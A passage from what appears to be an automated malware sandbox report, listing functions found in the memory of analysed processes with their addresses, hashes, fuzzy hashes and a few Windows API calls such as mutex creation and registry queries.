              Function 05040160, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: :@pq
              • API String ID: 0-3329585733
              • Opcode ID: 7e5120ee6599cb72022d18987527afe02bf11179fe01c3de6b59006ff53fe1b4
              • Instruction ID: 1943de4f0c4e9d4bc648450c1c8c84a19aac75ef48d852070234f57f629d80c4
              • Opcode Fuzzy Hash: 7e5120ee6599cb72022d18987527afe02bf11179fe01c3de6b59006ff53fe1b4
              • Instruction Fuzzy Hash: CE213072E01108AFDB05DFA6EC449DEFBFAFF88311F04812AE506F3210DA305A458B90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050428D7, Relevance: 1.3, Strings: 1, Instructions: 43COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: \,
              • API String ID: 0-2769694602
              • Opcode ID: b917be7ae449e667bb7cb9e4644984c8b54efeb7e5994a5cef224b975a375259
              • Instruction ID: e617730715d1a8796251db89ace7791d6dc13fabc24fe03749e370fd1f594fd4
              • Opcode Fuzzy Hash: b917be7ae449e667bb7cb9e4644984c8b54efeb7e5994a5cef224b975a375259
              • Instruction Fuzzy Hash: 6701F7216083815FD7029376582476F3FE15FC2310F2984AEA599D72E3C9688909CF22
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050428E8, Relevance: 1.3, Strings: 1, Instructions: 40COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: \,
              • API String ID: 0-2769694602
              • Opcode ID: 12f385c68fe6bca9a701a4d5629cc1e915542c0f54f6426263bdd1741100ec7e
              • Instruction ID: b8e985cbe925917974864973281047358522f4ceb1b12c57eb9cf32e31232b90
              • Opcode Fuzzy Hash: 12f385c68fe6bca9a701a4d5629cc1e915542c0f54f6426263bdd1741100ec7e
              • Instruction Fuzzy Hash: 9FF028206043815FD70253365C2466F3FE59FC3310B2580AAA559DB2E2CD648C09CF72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05040640, Relevance: 1.3, Strings: 1, Instructions: 30COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID: hV
              • API String ID: 0-4113920308
              • Opcode ID: fc0d8ae4d0662dd4ad9c60fd5fa7ebeebfbadb98294f3b04516c8aa726d25f34
              • Instruction ID: a0e69d0fe6190f75b41ea0b8cc2800c518ade32fcda8a725d707d8de3af0327e
              • Opcode Fuzzy Hash: fc0d8ae4d0662dd4ad9c60fd5fa7ebeebfbadb98294f3b04516c8aa726d25f34
              • Instruction Fuzzy Hash: 6EE09B327015108F8748E77B981C42D77D7EFC96213494079EA0EE3390DF704D469796
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05041DF8, Relevance: .4, Instructions: 382COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 99e67544406ce2d85ec9210c62b68e6171ce174e9e93e70e60249e4e7705f862
              • Instruction ID: 18cf19a1d3e3e32b92175313dc4e2e7b05c5155b3ff793c3d22f0478e6c6aa17
              • Opcode Fuzzy Hash: 99e67544406ce2d85ec9210c62b68e6171ce174e9e93e70e60249e4e7705f862
              • Instruction Fuzzy Hash: F1F15D757002068FC714DF69D484A6DBBF2EB84310F4685B9E40A9B26ADB70FC85CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05040006, Relevance: .1, Instructions: 99COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c472346f347c52039163fb4a1b3abc774da1a0792d7d1a5010bce6c9444d392f
              • Instruction ID: fb8be038ed64b09c9747b4b6e28b6ef6006a535125fb05e9209893351e0c6ea9
              • Opcode Fuzzy Hash: c472346f347c52039163fb4a1b3abc774da1a0792d7d1a5010bce6c9444d392f
              • Instruction Fuzzy Hash: 3D31727050D3854FC7029774D85965A3FF1AF43304F0A88EED085DF2A7EA288D49C752
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05041C41, Relevance: .1, Instructions: 89COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e7538115f8a245eb0e830927ac52a2f64ccc5c401cb3ccffa1a938e4f2bf489b
              • Instruction ID: 43a558b5abd75ea74b4fbb7bed75af62a3696c46814ddd20640feac572c263cd
              • Opcode Fuzzy Hash: e7538115f8a245eb0e830927ac52a2f64ccc5c401cb3ccffa1a938e4f2bf489b
              • Instruction Fuzzy Hash: 72314B70B006049BCB48EB69E454AADB7E3BF89315F204569E516EB3A0DE309C46CB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05040530, Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 73d70215d5a3c51b0de195235746c247c894aac4dc066c0d2aa5e69c81fe738e
              • Instruction ID: 320711bfadc5bb966d326beda40e4493aa162a4391391bf05a12e1e71797a14f
              • Opcode Fuzzy Hash: 73d70215d5a3c51b0de195235746c247c894aac4dc066c0d2aa5e69c81fe738e
              • Instruction Fuzzy Hash: 3E1128303002128FC759B738D468A6E36D7EFC6346B254478E50ADF7A5DE29DC869B82
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050420C0, Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9dbf12339fb4cd8a2aab43bf2fcf705a46efecfc045cc2e069df958c6dd53405
              • Instruction ID: 9bceaf7a7cfb608aef7d3390604759ac5dbbf9798426e0615e48cf533057fac9
              • Opcode Fuzzy Hash: 9dbf12339fb4cd8a2aab43bf2fcf705a46efecfc045cc2e069df958c6dd53405
              • Instruction Fuzzy Hash: 6C11E5BAB042129FD7209735BC447BE37E2AFD4311F050179ED0AD7295DB748854CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E005D0, Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.713174199.0000000000E00000.00000040.00000040.sdmp, Offset: 00E00000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bc8dc2cbd282136c9962a82763b009a5413848d2c4a9eea33588c4abe1f7737b
              • Instruction ID: 9835b04c54b7553473d82698ddf41e161b8acbf4044141d0dc9d77ea32994541
              • Opcode Fuzzy Hash: bc8dc2cbd282136c9962a82763b009a5413848d2c4a9eea33588c4abe1f7737b
              • Instruction Fuzzy Hash: 9101D6B55097816FD7118B16EC40853FFF8EF8623070984ABEC49CB612D235B909CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050422D0, Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 87cb447b5cdd4b768c2b69be31276c59c310c95c1bf2ab2a9407db69eb1ec325
              • Instruction ID: 0ca736c6c24fc29722ba6486429936141be681273a89cdc018cb8710ceea7d30
              • Opcode Fuzzy Hash: 87cb447b5cdd4b768c2b69be31276c59c310c95c1bf2ab2a9407db69eb1ec325
              • Instruction Fuzzy Hash: 0AF0A4717001108FC704E778D418B9E3BE6AF89315B25416AD40ECB765CD758C45C791
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05042360, Relevance: .0, Instructions: 37COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e81cda99f354433f2686527729727f9cf764d97068d9917bc84057101dbd6be5
              • Instruction ID: 8b3bfcac49b9bb1c4c9083b531211dba9e027ffa0762fd6e18c129e288e4ab5f
              • Opcode Fuzzy Hash: e81cda99f354433f2686527729727f9cf764d97068d9917bc84057101dbd6be5
              • Instruction Fuzzy Hash: 1BF0B4357002165BC668F33AD4204AE33D7AFC5AA13004568D505DB3C4EF25DC03D7D6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050422E0, Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 40166d5724c9acd51feb79da7b702da12e48bfada1227c7b6b8427e872fbd16f
              • Instruction ID: 511159eef68e788cb9769c098f207d0993e677acb70293fc3dc32f79807b0025
              • Opcode Fuzzy Hash: 40166d5724c9acd51feb79da7b702da12e48bfada1227c7b6b8427e872fbd16f
              • Instruction Fuzzy Hash: 1BF05E317001208FC708E7BDD418B5E36EAEF8D715B20416AE50ECB769DE71DC458791
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05042458, Relevance: .0, Instructions: 27COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62f5916ab3c083684e69b165f9404d2cdc325624cae43b9e085b9af0f22681c8
              • Instruction ID: 2b1532675ae2a0abd8b34a6ba9070564cce698c525bceebc244bf7320196e704
              • Opcode Fuzzy Hash: 62f5916ab3c083684e69b165f9404d2cdc325624cae43b9e085b9af0f22681c8
              • Instruction Fuzzy Hash: 97E012363006149FD718EB6AF89889E7B9AEBC9261350853BE50AD7314DE71DC4987A0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E005F6, Relevance: .0, Instructions: 27COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.713174199.0000000000E00000.00000040.00000040.sdmp, Offset: 00E00000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 23e5add74c5e96a6b6bbd36fed5be8ddc4c45195d6263de5d30f468f5fe0cf66
              • Instruction ID: 204f041448862684744e0f6efd2363bfbd014d3d84d972b148aaa068c1690543
              • Opcode Fuzzy Hash: 23e5add74c5e96a6b6bbd36fed5be8ddc4c45195d6263de5d30f468f5fe0cf66
              • Instruction Fuzzy Hash: 45E092B66006005BD750CF0AEC81852FBE8EB88630718C07FDC0D8BB01E535F504CEA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050424F1, Relevance: .0, Instructions: 25COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 89136f8f716f3ee2a9e8998dcd1394d033a3972fc271fdd11f5bb97c69ad73f6
              • Instruction ID: 94e2ba0377f520d9caf0dd409c3e2bb22a7d74c17ed513dae0e699ac9cabce71
              • Opcode Fuzzy Hash: 89136f8f716f3ee2a9e8998dcd1394d033a3972fc271fdd11f5bb97c69ad73f6
              • Instruction Fuzzy Hash: E8E0D8713091505FD304A3B8A414B9E7BE9DFC6315B1540BFE109D73A2CD7558468B51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05042500, Relevance: .0, Instructions: 22COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 66d2ac36f70122e33bbf033c992d78fef7c4a451ccd160e0244d0febf13e0c81
              • Instruction ID: 79b5127537f7a1cf229afd9b4fa7f9790820ef9d4d5926f2d080557044c09100
              • Opcode Fuzzy Hash: 66d2ac36f70122e33bbf033c992d78fef7c4a451ccd160e0244d0febf13e0c81
              • Instruction Fuzzy Hash: 8AE0C2313142119BC30872ADE000A4E73DEDBCA326B10407AE509C7355CDB5AC4647A2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 050406C8, Relevance: .0, Instructions: 17COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 78cb842c4eaed259f250bcad87f15c413bb89ab13af2cd864140b333d49dcacf
              • Instruction ID: 7f6f4b67f53d8dd53a1e9918cbf88766030b9be52379670e0073f6123eef53a1
              • Opcode Fuzzy Hash: 78cb842c4eaed259f250bcad87f15c413bb89ab13af2cd864140b333d49dcacf
              • Instruction Fuzzy Hash: DDD0A7F3544700EFD304C7209C45B6F7BECCB85311F208166B96AE61D1FA7044494722
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05040251, Relevance: .0, Instructions: 15COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bcd4bcc9aa8da4e6aff167a4863cd7efde6b5d927d5bf168b3e5976f01a6f50e
              • Instruction ID: 6900e58d9e5cef7a3cf14ac2c2927cddcb4a8b8690d944fb1e6a82f5e5f4d81f
              • Opcode Fuzzy Hash: bcd4bcc9aa8da4e6aff167a4863cd7efde6b5d927d5bf168b3e5976f01a6f50e
              • Instruction Fuzzy Hash: 0CD01236B011108FDF24D6FDF4192ECB796EFC4225B1001BBD54AEB661EA35CC598B12
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E523F4, Relevance: .0, Instructions: 15COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.713244797.0000000000E52000.00000040.00000001.sdmp, Offset: 00E52000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e8195e79a7530392e4276f96aa580f60732587c7b19776a912f108ef320e0ab0
              • Instruction ID: 904e931282d45b786d739a0032d6e0d15ab0d7bdf74cb95d95e5bf91721676e2
              • Opcode Fuzzy Hash: e8195e79a7530392e4276f96aa580f60732587c7b19776a912f108ef320e0ab0
              • Instruction Fuzzy Hash: BED05E79205B914FD3268A1CC1A8B953BD4AB52B09F4648FDEC008B667C369DA85E200
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E523BC, Relevance: .0, Instructions: 14COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.713244797.0000000000E52000.00000040.00000001.sdmp, Offset: 00E52000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6b5e1f62b384e37c0bd0acc86958447b12735d0504fde0151e690a0d0757a3c1
              • Instruction ID: e61ca8c81b30c1f188c4cad21a4d7e82c71de8d78939e38765b96c36e99f214e
              • Opcode Fuzzy Hash: 6b5e1f62b384e37c0bd0acc86958447b12735d0504fde0151e690a0d0757a3c1
              • Instruction Fuzzy Hash: CCD05E342002824BC715DB0CC594F5937D4AB42B05F0658ECAD008B266C7A8DC85C600
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05040130, Relevance: .0, Instructions: 13COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: eca9df81b9b2e87792bef7deda3a816424b57d9126036f51cdbd6aa475b8d4ec
              • Instruction ID: a0410cd1e03ec244545993540e1917f9f17632628afb66b80dd3538a48e9e29d
              • Opcode Fuzzy Hash: eca9df81b9b2e87792bef7deda3a816424b57d9126036f51cdbd6aa475b8d4ec
              • Instruction Fuzzy Hash: 0AC02B303946080BDF4057FD7C8872A33CC5B80308F440430B40ECB252ED19DC404140
              Uniqueness

              Uniqueness Score: -1.00%

              Function 05042428, Relevance: .0, Instructions: 11COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1378a27804e7754fd328ac069913645a58f1cc39981a3bf9294c6c8402f53b44
              • Instruction ID: 3a3a838bdac20fe4c318276f9d5ab8d9486ef11f5699c1128978c5b8ef217328
              • Opcode Fuzzy Hash: 1378a27804e7754fd328ac069913645a58f1cc39981a3bf9294c6c8402f53b44
              • Instruction Fuzzy Hash: 7BC012B0414201EFC744EF28ED4586A7BF0FB80605F84C92DE48DC2114F270555CCB52
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Analysis Process: MSBuild.exe PID: 6940 Parent PID: 6376 MSBuild.exeCOMMON

              Executed Functions

              Function 02D23850, Relevance: 2.0, Strings: 1, Instructions: 759COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID: >_uq
              • API String ID: 0-588969242
              • Opcode ID: 3f9a9f2dc6a556652d6495812ae573e3f64fbc747b550fbc8055decae325954b
              • Instruction ID: 3fde648cde5b6827dd4f58091782729bcd6602d0eaf1e2b19f301227af76ee0e
              • Opcode Fuzzy Hash: 3f9a9f2dc6a556652d6495812ae573e3f64fbc747b550fbc8055decae325954b
              • Instruction Fuzzy Hash: 4E42E371A04225CFCB14CF68C48496AFBB2FF95308B15C5A6D819AF356C735EC4ACB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D223A0, Relevance: .5, Instructions: 505COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e2950862edaab233a338c32d55a4e5eef53de0472ba2b0e609f94766dacfcdba
              • Instruction ID: 7a82265fc816b6c85f8da83f6029fd27f61a4ea2eec9b3e0c16cecdf5322fd5e
              • Opcode Fuzzy Hash: e2950862edaab233a338c32d55a4e5eef53de0472ba2b0e609f94766dacfcdba
              • Instruction Fuzzy Hash: 20129B30A04225CFD724DF29C4987ADB7F2BBA9318F148169E856AB354DB78DC4ACB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D22FA8, Relevance: .2, Instructions: 239COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 76e4ced42d8a4d2710cc92c07b39fda39c5057535ecddc34fc3ed79af9049d51
              • Instruction ID: 873f994c68932578d11c66993c1378598f42d6ddb5d8271be9ba4f04626102af
              • Opcode Fuzzy Hash: 76e4ced42d8a4d2710cc92c07b39fda39c5057535ecddc34fc3ed79af9049d51
              • Instruction Fuzzy Hash: 3E819B31F001268BD754DF69C984B6EB7E3AFD8318F2A80A4E405AB365DE38DC05CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D20681, Relevance: 2.6, Strings: 2, Instructions: 128COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID: Zp^$Yp^
              • API String ID: 0-574385174
              • Opcode ID: 974069fcb5edcc01fd5bd921ba985120589d452938015add5a3d1b18a4aaf787
              • Instruction ID: c51546c3cd3544aacbabcd7b77b095fc18281b5d0273241b3160b2296cc0cac6
              • Opcode Fuzzy Hash: 974069fcb5edcc01fd5bd921ba985120589d452938015add5a3d1b18a4aaf787
              • Instruction Fuzzy Hash: 08413A306003119BD735BF34E81D66D3B6ABFB2746B14856EE502DB2A9DF349C068BD2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02D22D58, Relevance: 2.6, Strings: 2, Instructions: 125COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID: $>_uq
              • API String ID: 0-2154891095
              • Opcode ID: b9d2bd510935216a7328f2efd49eed171ca5f384eeb905d62e34432fdfa6e62f
              • Instruction ID: f9f5b8d5e7a7e1115f4ce222cd29a612545252d59b501eb3dd7f475abedc186f
              • Opcode Fuzzy Hash: b9d2bd510935216a7328f2efd49eed171ca5f384eeb905d62e34432fdfa6e62f
              • Instruction Fuzzy Hash: 7941E670E082258BCB10DF69C8895BEB7B2EBD1318B25C576E851DB705C735EC0AD792
              Uniqueness

              Uniqueness Score: -1.00%

              Function 053401F4, Relevance: 1.6, APIs: 1, Instructions: 99synchronizationCOMMON
              Download Yara Rule
              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 0534019D
              Memory Dump Source
              • Source File: 00000013.00000002.745763241.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: 4f0e7962d9e2ebf6e2c0f75707ecef2625df9aeb1532b752cdb8d41f6fd817e6
              • Instruction ID: 9fb1340515cb9e0dff26a18b33bc17924680d6f2174b550c1ea527804309aad8
              • Opcode Fuzzy Hash: 4f0e7962d9e2ebf6e2c0f75707ecef2625df9aeb1532b752cdb8d41f6fd817e6
              • Instruction Fuzzy Hash: 8C31E6755093809FD715CF25DC89B66BFA4EF06220F0884EBDD85CF652D275A904CB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0120AA02, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0120AAB1
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: 84084c9733e4e70473c3eb9a088886344feddb70b2b5cd86faa41fc078a83e8f
              • Instruction ID: 5c896203604e4292a1a8513f8d9d9c8595198e718b1b67272c26cdc96b50e1b1
              • Opcode Fuzzy Hash: 84084c9733e4e70473c3eb9a088886344feddb70b2b5cd86faa41fc078a83e8f
              • Instruction Fuzzy Hash: 7B31C2B25443846FE7228B25CC45FA7BFBCEF05310F0885AAED818B193D264E949CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0120AAF9, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,613CD90A,00000000,00000000,00000000,00000000), ref: 0120ABB4
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: af97bdb48308dbce026cb7bca00b238d11417f8ff08f19ebe4e48bfe9582c090
              • Instruction ID: 670430700f28315668c58ea0a8780b31d3b104ee1bb9934ff15f2d27d7c62f8f
              • Opcode Fuzzy Hash: af97bdb48308dbce026cb7bca00b238d11417f8ff08f19ebe4e48bfe9582c090
              • Instruction Fuzzy Hash: F531B1711097846FE722CF25CC84F92BFE8EF06320F08899AE985CB193D264E548CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 053400F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON
              Download Yara Rule
              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 0534019D
              Memory Dump Source
              • Source File: 00000013.00000002.745763241.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: 6866c9d4affbe7a85d96230d1967314e8fc49ded2b6a60eb20eca1730f502f15
              • Instruction ID: 125b1b8c40499b0ee7fd39ef9346f387b3236fc750f25a800e34a4998a478598
              • Opcode Fuzzy Hash: 6866c9d4affbe7a85d96230d1967314e8fc49ded2b6a60eb20eca1730f502f15
              • Instruction Fuzzy Hash: 783181B55097806FE722CB25DC84B56FFE8EF06210F08849AE985CF292D375E909CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0120AF50, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
              Download Yara Rule
              APIs
              • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 0120AFEA
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: 4e64e08eda3db57356f63e3cbf2e6d6c6a2d2ebbbc81028539199d30e950e8ca
              • Instruction ID: 5e6cb0b7a3f0b041c9452b75762eafd3af4154c1583504a51a7892c03c8de7c5
              • Opcode Fuzzy Hash: 4e64e08eda3db57356f63e3cbf2e6d6c6a2d2ebbbc81028539199d30e950e8ca
              • Instruction Fuzzy Hash: C621B57140D3C06FD3138B259C51B65BFB4EF47620F0A41DBE984CB5A3D125A919C7B2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0120AA32, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0120AAB1
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: d4c7278de01cd38b820b201c9e287f353947197d75cdbe29502b857b497c773d
              • Instruction ID: cd53677dc30e1d303a438c11f7320238d0ac938604374899cf0ba6d7e49e4688
              • Opcode Fuzzy Hash: d4c7278de01cd38b820b201c9e287f353947197d75cdbe29502b857b497c773d
              • Instruction Fuzzy Hash: A821C272500304AEE722CE59DD85FABFBECEF08320F04851AE9459B682D674E5498AB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0534012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
              Download Yara Rule
              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 0534019D
              Memory Dump Source
              • Source File: 00000013.00000002.745763241.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
              Similarity
              • API ID: CreateMutex
              • String ID:
              • API String ID: 1964310414-0
              • Opcode ID: 87ea9003e6d635ae176bf489fc7b57d8752619bbbfcdef835e8ffa99be4ed84c
              • Instruction ID: 1b791d134abd9f8f2fa00b89e141d4f93a58d04122d19dbeeb31b4be5b7844f9
              • Opcode Fuzzy Hash: 87ea9003e6d635ae176bf489fc7b57d8752619bbbfcdef835e8ffa99be4ed84c
              • Instruction Fuzzy Hash: A4217C75604240AFE724DF6ADC89B6AFBE8EF04310F04846AEE498F641E775E504CA61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0120AB3A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,613CD90A,00000000,00000000,00000000,00000000), ref: 0120ABB4
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: 5b7c64ab3553942cbe00e6cd42e76b5c7a5c57656c4393d979c553b8d696a45b
              • Instruction ID: 6deb4d61dc7b6c12bfa8f698ccf5ea417e5f2ec02acdc12a5faabc87f86961c7
              • Opcode Fuzzy Hash: 5b7c64ab3553942cbe00e6cd42e76b5c7a5c57656c4393d979c553b8d696a45b
              • Instruction Fuzzy Hash: BB218175600704AFE722CE19DC85F66FBECEF14710F44895AEA458B692E764E404CAB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0120A51F, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0120A58A
              Memory Dump Source
              • Source File: 00000013.00000002.744750510.000000000120A000.00000040.00000001.sdmp, Offset: 0120A000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: d975022b7164b88049ad672f0bd5a87111ed72cf311883bf723e96d5cd26ba0c
              • Instruction ID: b319d9da9fe198b228714739931797dee065bfbef6ac3757aa09f9a3a0d468b5
